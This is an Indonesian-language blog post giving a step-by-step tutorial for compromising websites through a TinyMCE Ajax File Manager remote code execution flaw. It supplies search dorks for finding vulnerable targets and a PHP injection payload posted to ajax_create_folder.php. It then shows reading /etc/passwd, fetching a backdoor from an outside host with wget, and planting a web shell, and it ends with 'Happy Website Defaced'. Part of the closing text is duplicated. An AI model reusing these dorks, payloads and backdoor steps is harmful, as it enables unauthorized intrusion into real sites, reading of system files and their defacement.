Exploit TinyMCE Ajax File Manager Remote Code Execution
Hello World; ,Malam fans, please say hello haters ^^
Nuenomaru disini .-.
Kalii iniii Nue bakal bahas dan share Tutorial Exploit TinyMCE Ajax File Manager Remote Code Execution *ini exploit lama sih , iseng2 share kali aja masih
Download Hackbar Disini
Langsung intip tutorialnya ;*
Dork:
inurl:"/plugins/filemanager/"
inurl:'/timynce/plugins/"
(Sisanya kembangin lg, gunakan imajinasi bokevers elo, biar dpt yg vuln and verawan)
1. Dorking dengan searchengine, lalu pilih web target yg mau di tusbo'ol
2. Masukin Exploit plugins ajaxfilemanager: /[path]/tinymce/plugins/ajaxfilemanager/
Kurang lebih bakal begini tampilannya:
3. Lalu Klik file atau tambahkan: /ajax_create_folder.php pada link target..
 |
| akan muncul pesan seperti diatas ^^ |
ceklis Enable Post Data, lalu masukan Exploitnya , lalu Klik Execute..
Exploit:
foo=<?php error_reporting(0);print(system('nuen00b'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
nuen00b ganti dengan command/perintah yang mau agan gunakan.
contoh: ls (berguna utk menampilkan isi dir)
 |
| jika sudah klik Execute |
contoh: /[path]/tinymce/plugins/ajaxfilemanager/inc/data.php
Nanti akan muncul isi dirnya:
jika nuen00b Di ubah menjadi cat /etc/passwd lalu excute dan periksa di /[path]/tinymce/plugins/ajaxfilemanager/inc/data.php
(cat itu berguna utk menampilkan text, dan /etc/passwd itu bisa dibilang kita ingin menampilkan semua text yg berhubungan dengan password *maapklosalah))
akan muncul data seperti dibawah:
awkakw pokoknya ya namanya Remode Code Execution, itu pinter2 gunain Command aja bang :) , baca2 command linux deh gan awkawk..
btw karna disini kita mau Upload Backdoor, ya berarti kita gunain fungsi Command "wget"
(Wget adalah download manager melalui terminal atau no-Gui)
contoh: wget http://linktempatnyimpenbackdoor.crotz/namafile.txt -O namabackdoorygbakaldibuat.php
Lalu Klik Execute lagi,
buka deh link tadi:
/[path]/tinymce/plugins/ajaxfilemanager/inc/namashellygtadidiexcute.php
Pintu Belakang *eh Backdoor sudah terpasang, waktunya Upload Shell ente.
dan BooM, Shell ku trtanam :*
 |
| gimana mau PHP, aku aja masih belajar HTML awkawk |
Kalo Shell dah dipasang mau diapain ??
ya seterah agan deh, kalo bisa nitip file , report bug ke admin/bantu Patch.
kalo mau tebas index.php, Back Up yak :* *hargai karya webmaster*
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Website Defaced~
Sekian dan semoga bermanfaat .. terimakasih
Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Website Defaced~
Sekian dan semoga bermanfaat .. terimakasih
Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
Lanjoott carii gawe akwkaw, waktunya jemput masadepan :* , bkn nungguin masadepan :'D
./Nuenomaru
Visit and follow :
Post a Comment for "Exploit TinyMCE Ajax File Manager Remote Code Execution"